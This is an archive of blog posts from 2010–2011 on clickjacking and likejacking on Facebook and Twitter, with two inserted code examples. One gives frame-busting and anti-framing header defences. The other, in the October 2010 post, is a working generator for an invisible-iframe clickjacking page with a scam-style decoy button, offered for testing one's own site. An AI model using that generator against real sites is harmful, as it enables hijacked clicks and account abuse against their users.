Posts tagged ‘social networking’

Server-side Clickjack Protection

September 11, 2011

If you’ve been worrying about clickjacking attacks on the websites you visit often, you might be surprised to learn that sites have the ability to impede these attacks. The fact of the matter is that some websites just don’t focus much on the security measures that would really keep their visitors safe. That isn’t to say that website administrators and developers could prevent all clickjacking attacks, but they could certainly make it harder for attackers to ruin your day.

Quite frankly, social networking sites (especially Facebook) are some of the worst offenders. To some extent, that’s understandable. Consider, for instance, how many people visit Facebook every day. That makes the site a target for clickjackers who want to reach a large audience quickly. Plus, Facebook wants to make it easy for people to share information with each other, and any kind of block could negatively affect the service.

When it comes down to it, though, more websites could use server-side clickjacking protection. It’s actually pretty easy.

The most common technique is called a framekiller (or frame-buster). It’s a short piece of JavaScript on the protected page that checks whether the page is the top-level window and, if it finds itself loaded inside someone else’s frame, breaks out, usually by navigating the top window to its own address. Unfortunately, it’s not always reliable, because it runs inside the attacker’s page: the attacker can stop the script from running or from navigating the top window (Internet Explorer’s restricted-security iframe mode is the classic example), and the framed page stays framed and clickable. The dependable option really is server-side: send an X-Frame-Options response header (DENY, or SAMEORIGIN if the site frames its own pages) and the browser refuses to render the page in a foreign frame before any script is involved. The safest framekillers also keep the page’s content hidden until the script has proved it is top-level, so a blocked script leaves nothing to click on.
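The two layers of defence described above, as an added example rather than code from the original post: the frame-buster in its naive and hardened forms, and the X-Frame-Options header a server should send regardless. The window objects, header values and the victim URL are constructed stand-ins so the logic runs under Node without a browser.

```javascript
// Added example, not code from the original post: a naive frame-buster, the
// hardened "stay hidden until proven top-level" variant, and the server-side
// X-Frame-Options header that should back them up. `win` is a plain object
// standing in for the browser's window so the logic runs under Node.

// Classic frame-buster. It only works if the framed page is allowed to
// navigate `top`; an attacker's frame can block that (IE's
// <iframe security="restricted"> is the textbook case), and then the
// page stays framed and fully clickable.
function naiveFrameBuster(win) {
  if (win.top === win.self) return 'top-level';
  try {
    win.top.location = win.self.location.href;
    return 'busted';
  } catch (e) {
    return 'framed-and-stuck';
  }
}

// Hardened variant. The page ships with <body style="display:none"> and is
// revealed only after proving it is the top window. If the attacker blocks
// the script or the navigation, the content stays invisible: there is
// nothing under the victim's cursor to hijack.
function hardenedFrameBuster(win) {
  if (win.top === win.self) {
    win.document.body.style.display = 'block';
    return 'revealed';
  }
  try {
    win.top.location = win.self.location.href;
  } catch (e) {
    // navigation blocked; fall through and stay hidden
  }
  return 'hidden';
}

// Server side: headers the browser enforces before any page script runs.
// X-Frame-Options was the only option in 2011; CSP frame-ancestors is its
// modern successor and is included so the helper is still current.
function antiFramingHeaders(policy) {
  if (policy !== 'DENY' && policy !== 'SAMEORIGIN') {
    throw new Error('policy must be DENY or SAMEORIGIN');
  }
  return {
    'X-Frame-Options': policy,
    'Content-Security-Policy':
      policy === 'DENY' ? "frame-ancestors 'none'" : "frame-ancestors 'self'",
  };
}

// Audit: classify a response's headers (case-insensitive names) by the
// strongest anti-framing control present.
function framingProtection(headers) {
  const h = {};
  for (const name of Object.keys(headers)) h[name.toLowerCase()] = String(headers[name]);
  if (/(^|;)\s*frame-ancestors\s+\S/i.test(h['content-security-policy'] || '')) return 'csp';
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') return 'x-frame-options';
  return 'none';
}

// Constructed window objects for the demo: framed or not, and whether the
// hostile parent lets us navigate `top`.
function mockWindow({ framed, navigationBlocked }) {
  const win = {
    location: { href: 'https://victim.example/settings' }, // assumed URL
    document: { body: { style: { display: 'none' } } },
  };
  win.self = win;
  if (!framed) {
    win.top = win;
  } else {
    const top = {};
    Object.defineProperty(top, 'location', {
      get() { return undefined; },
      set() { if (navigationBlocked) throw new Error('navigation blocked'); },
    });
    win.top = top;
  }
  return win;
}

console.log('naive, blocked:   ', naiveFrameBuster(mockWindow({ framed: true, navigationBlocked: true })));
console.log('hardened, blocked:', hardenedFrameBuster(mockWindow({ framed: true, navigationBlocked: true })));
console.log('headers:', antiFramingHeaders('DENY'), framingProtection(antiFramingHeaders('DENY')));
```

The point of the comparison is the failure mode: with navigation blocked, the naive buster reports the page framed and stuck while still showing its content, whereas the hardened version leaves the body hidden. Neither replaces the header; run `framingProtection` against your own site's responses and treat `none` as a finding.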

Should websites have more responsibility when it comes to protecting visitors? That depends. A site like Facebook should definitely lead the security work to stop clickjacking. It’s big enough and has enough resources to take on the problem. Plus, it’s in its best interest to offer more safety to its members. Since Facebook doesn’t have a true competitor, though, the company might not feel too motivated in this area.

Free Southwest Plane Tickets

February 25, 2011

Fraudsters have promised free airline tickets before by creating fake advertisements for companies like JetBlue and Delta. Most of these have been standard clickjacking scams that spread via a person’s Facebook wall. The trick is fairly simple, even for attackers with minimal training. They create a fake ad for free plane tickets. Layered invisibly above the ad, however, is a frame holding a real Facebook control, such as a Share or Like button. The victim thinks they are clicking the ad; the click actually lands on the hidden button, and Facebook, seeing a click from a logged-in user, posts the message to that person’s wall. This is the fastest way for attackers to spread their message to millions of people.

The latest clickjacking scheme, this one for Southwest Airlines, however, takes a slightly different approach that has tricked savvy facebook users who thought they knew how to avoid fraudulent ads.

Instead of making clickjacked ads that post a message to a person’s wall, this scheme posts messages in other locations. By posting the message as, for instance, a picture comment, the attackers find that more Facebook users are tricked into following the link.

Why? Well, any new scheme is certain to trick a few people just because it hasn’t been encountered before. There’s also a psychological factor involved.

When a clickjacked link is posted under a picture, most people assume it is a comment written directly by someone they know. That was once true of wall posts too, but Facebook users have since become wary of posts that seem out of character. This tactic takes clickjacking to a new level of personal communication.

Of course, there is a big problem for the attackers: clickjacked links posted as picture comments often seem out of context. That’s a good way to spot them. We’ve always been taught to question deals that seem too good to be true. Now it’s time to consider whether the offers sound too weird to be true.

Top Five Internet Security Misconceptions

November 19, 2010

Just a couple of days ago, Kindsight, a company that focuses on issues such as identity theft, published a blog post explaining the top five internet security misconceptions it has found among casual internet users. One of those misconceptions is that “Facebook is safe enough; no need to worry.”

Apparently, those people don’t read this blog, or the countless others discussing security issues spread through social networking sites.

To a large extent, Facebook itself is fairly safe. But it is used to push people towards compromised content, most often through clickjacking attacks. When attackers set up clickjacking pages, they publicize them by posting the URLs on Facebook, Myspace, and other popular social networking sites, along with a statement that will entice the average user into following the link. Popular topics focus on busty girls and Justin Bieber, although I’m pretty sure that there is a connection there.

When users follow the tempting link, they are taken to a page with invisible elements layered over the visible ones. Click on the page, and you have actually clicked something you never saw: a button that shares the link onward, grants an application access to your account, or starts a download of potentially malicious software that can infect your computer.

Facebook’s safety was listed as the number five misconception. The others include:

  1. Internet users are safe from identity theft as long as they don’t shop online
  2. Anti-virus protection means internet users are safe
  3. Using secure websites means that you will never encounter security problems
  4. Hacked websites are easy to identify and avoid

Unfortunately, none of these statements are true. You can read the entire article, and view video clips, at the Kindsight Blog.

Making Facebook more secure and fun

October 26, 2010

Facebook isn’t a whole lot of fun when you’re constantly worried about likejacked links that could endanger your account or your computer’s security. Until recently, though, there hasn’t been a whole lot that Facebook members could do to avoid clickjacked links on Facebook. The best strategies were to pay attention and pray.

As Facebook and other social networking sites have become more dangerous for casual computer users, security vendors have looked for ways to stop clickjackers from stealing the fun from the internet. BitDefender recently released software that aims to make Facebook safer and more fun.

The app is called SafeGo. It has been specifically designed to protect Facebook users from clickjacking attacks. When you use SafeGo, it alerts you to potential threats and highlights compromised links. It even manages to make computer security lighthearted and fun. When you install the SafeGo app, it asks you to take a brief quiz designed to estimate your security risk. Most of the questions, however, are outlandish. If you are a fan of the surreal, then you’ll enjoy taking the quiz.

After completing the quiz, SafeGo will show you compromised links from your friends. This gives you the opportunity to alert your friends about the security risks.

In order to take advantage of BitDefender’s new application, you are going to have to trust the company a bit. SafeGo is a Facebook app, and it asks for access to your account and your friends’ posts that you wouldn’t normally grant to an application. So far, there aren’t any reports of the company misusing that access, but there is always the chance that they, or someone who compromises them, could use SafeGo’s permissions for nefarious purposes. Chances are that you will be safe. Still, you should know that the risk exists.

Clickjacking represents serious problem for some employers

October 4, 2010

Most employers worry about viruses, trojans, and other types of malware that infiltrate their systems via email. A recent survey, however, suggests that employers might want their IT managers to shift some focus from email to web-borne risks. According to Panda Security, cybercriminals have been devoting more of their resources to clickjacking techniques than to email scams.

Clickjacking uses an invisible frame that sits on top of a visible image, button, or link. The frame contains a real page from a site where the victim is already logged in, positioned so that one of that page’s buttons lies exactly over the visible decoy. When you look at the attacker’s page, you see only ordinary images, buttons, and links, and that is the point: the criminals want to convince you that it is perfectly safe to click. When you click the element you can see, the click actually lands on the invisible frame above it, and the target site carries out the action, whether that is sharing a link, “liking” a page, authorising an application, or confirming a download, as if you had asked for it. In the worst case, the action you unknowingly approved hands you malware.
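How the layered page described above is put together, as an added example (not code from the original post or from any real scam): a generator for a clickjacking test page that you point at a page you own, to find out whether it can be framed and clicked through. The target URL, decoy text, and pixel offsets are assumed placeholders.

```javascript
// Added example, not code from the original post: builds the two-layer page
// the paragraph describes so you can test whether one of YOUR pages can be
// framed and clicked through. Every value (the target URL, decoy text,
// offsets) is a placeholder assumption; use it only against a site you are
// authorised to test.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// opts.targetUrl : page whose real button the victim should hit (assumed)
// opts.decoyLabel: what the victim believes they are clicking
// opts.offsetX/Y : distance of the target's button from the frame's top-left
//                  corner, found by loading the target and measuring
// opts.opacity   : 0 for the "attack"; 0.5 while you are aligning the layers
function clickjackPoc({ targetUrl, decoyLabel, offsetX, offsetY, opacity = 0 }) {
  if (!/^https?:\/\//i.test(targetUrl)) throw new Error('targetUrl must be absolute');
  if (opacity < 0 || opacity > 1) throw new Error('opacity out of range');
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Free tickets</title>
<style>
  /* Layer 1: the visible decoy, underneath. */
  #decoy { position:absolute; left:100px; top:100px; width:200px; height:40px;
           z-index:1; font-size:18px; }
  /* Layer 2: the real target, on top, shifted so its button covers the decoy
     and made (nearly) invisible. The browser delivers the click to the
     topmost element, i.e. to the framed site, not to the decoy. */
  #target { position:absolute; left:${100 - offsetX}px; top:${100 - offsetY}px;
            width:1000px; height:800px; border:0; z-index:2; opacity:${opacity}; }
</style></head>
<body>
  <button id="decoy">${escapeHtml(decoyLabel)}</button>
  <iframe id="target" src="${escapeHtml(targetUrl)}" scrolling="no"></iframe>
</body></html>`;
}

// Sanity check on a generated page: is the framed layer really on top and
// really invisible? Handy when you have been fiddling with the template.
function overlayIsHidden(html) {
  const z = [...html.matchAll(/#(decoy|target)\s*\{[^}]*z-index:(\d+)/g)]
    .reduce((m, [, id, zi]) => ({ ...m, [id]: Number(zi) }), {});
  const op = /#target\s*\{[^}]*opacity:([0-9.]+)/.exec(html);
  return z.target > z.decoy && op !== null && Number(op[1]) === 0;
}

const demo = clickjackPoc({
  targetUrl: 'https://victim.example/like',   // assumed target
  decoyLabel: 'Claim your free tickets',
  offsetX: 30,
  offsetY: 20,
});
console.log('overlay hidden:', overlayIsHidden(demo));
```

Set `opacity` to 0.5 while lining the target’s button up over the decoy, then back to 0. If the target page sends X-Frame-Options DENY or SAMEORIGIN, the frame renders blank and the click-through fails, which is exactly the result a site owner wants to see.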

Currently, social networking sites are the easiest way for criminals to spread clickjacking attacks. In fact, clickjacks on Facebook have become so common that they have their own name, likejacks: the hidden element is Facebook’s Like button, so each victim’s click advertises the attacker’s page to all of their friends.

Why is this such a problem for employers?

The Panda Security survey shows that 77 percent of employees polled admitted to using company computers to access social networking sites. Perhaps even more disturbing is that 33 percent of the companies included in the survey were infected by malware distributed through clickjacks.

The easiest solution is for employers to block Facebook, Myspace, and similar sites. Businesses that rely on these sites to communicate with their customers, however, might not have that option. Instead, they should focus on educating employees about the dangers of clickjacking and the ways they can protect their computers while logged on to social networking sites. Keeping browsers and plug-ins up to date, using reliable antivirus software, and scanning computers regularly for harmful files also help stop malware from causing problems.

How Much Do We Know about Click-Jacking?

June 14, 2010

Everyone from my six-year-old to my grandmother knows about the threats of computer viruses. It’s a no-brainer these days. If you know how to double-click an IE icon, then you know to scan email attachments for viruses and stay away from sites that offer illegal downloads.

Viruses still get around, but we’re all much better educated about them than we were a decade ago.

When it comes to clickjacking, though, few of us understand the threat well enough to avoid it. Searching Google for “clickjacking threat” brings up as many articles from today as 2008. That suggests to me that a significant number of internet users don’t know what’s going on.

This is a dangerous situation because click-jacking attacks have become more sophisticated. The latest attacks use social networking sites to trick people into unknowingly installing applications. These apps aren’t always dangerous; in fact, the most pervasive ones have been more annoying than anything else. Still, the lack of education combined with the potential creates a very dangerous situation.

If people don’t start talking about clickjacking as much as they talk about viruses and worms, then hackers are eventually going to unleash a giant attack that ruins a lot of lives.

This isn’t an exaggeration, or at least not a big one. Clickjacking can make a user approve an install, a download, or a permission change without ever realising that anything happened, and that is how a virus or worm could end up on a machine. This is a tool for attackers that could completely change the internet security game.

Getting informed about click-jacking attacks, however, can help you avoid them. It’s not as hard as you might think. Using your head and staying skeptical are two of the best defenses. Using up-to-date web browsers, antivirus software, and plug-ins like NoScript (whose ClearClick feature is aimed specifically at clickjacking) can also help considerably.

Until we teach more people about click-jacking, though, the threat remains high for us all.

Clickjacking Attack on Twitter

March 16, 2010

Last year Twitter responded to its first clickjacking attack. No one has reported lasting damage from the attack, but users could potentially have compromised their accounts by falling for the prank.

The scheme involved a tweet reading “don’t click” followed by a link. Of course, many of those who saw the message clicked on the link out of curiosity. This led to a page with a single button that also said “don’t click.” Clicking that button appeared to do nothing, but layered invisibly over it was a frame containing Twitter’s own status-update form, pre-filled with the same “don’t click” message. The click landed on the form’s submit button instead, so the victim’s logged-in account tweeted the message to everyone following them.

Many people passed it on without knowing that they had ever been duped by some sneaky programming.

Like many clickjacking schemes that use social networking tools, the message spread like wildfire.

Within just six hours the message had reached 260 users and was growing exponentially. Twitter caught on quickly, though, and shut down the attack. According to the company’s representatives, it did not take long to identify the problem and solve it.

Even though the “don’t click” clickjacking attack didn’t spread any malware or steal information, it shows that Twitter users should be more careful: the same trick could have made their accounts do something far more serious.

It’s good to see that Twitter responded so quickly to the threat. This indicates to me that they have a crack team of security specialists who understand the potential threats that could harm their members.

I suppose that the ultimate lesson here, though, is that while you can’t believe everything that you see on Twitter, you can be fairly certain to not do things when instructed not to do them.

You can read more about “don’t click” at Sunlight Labs, CNET, and Daniel Sandler’s blog.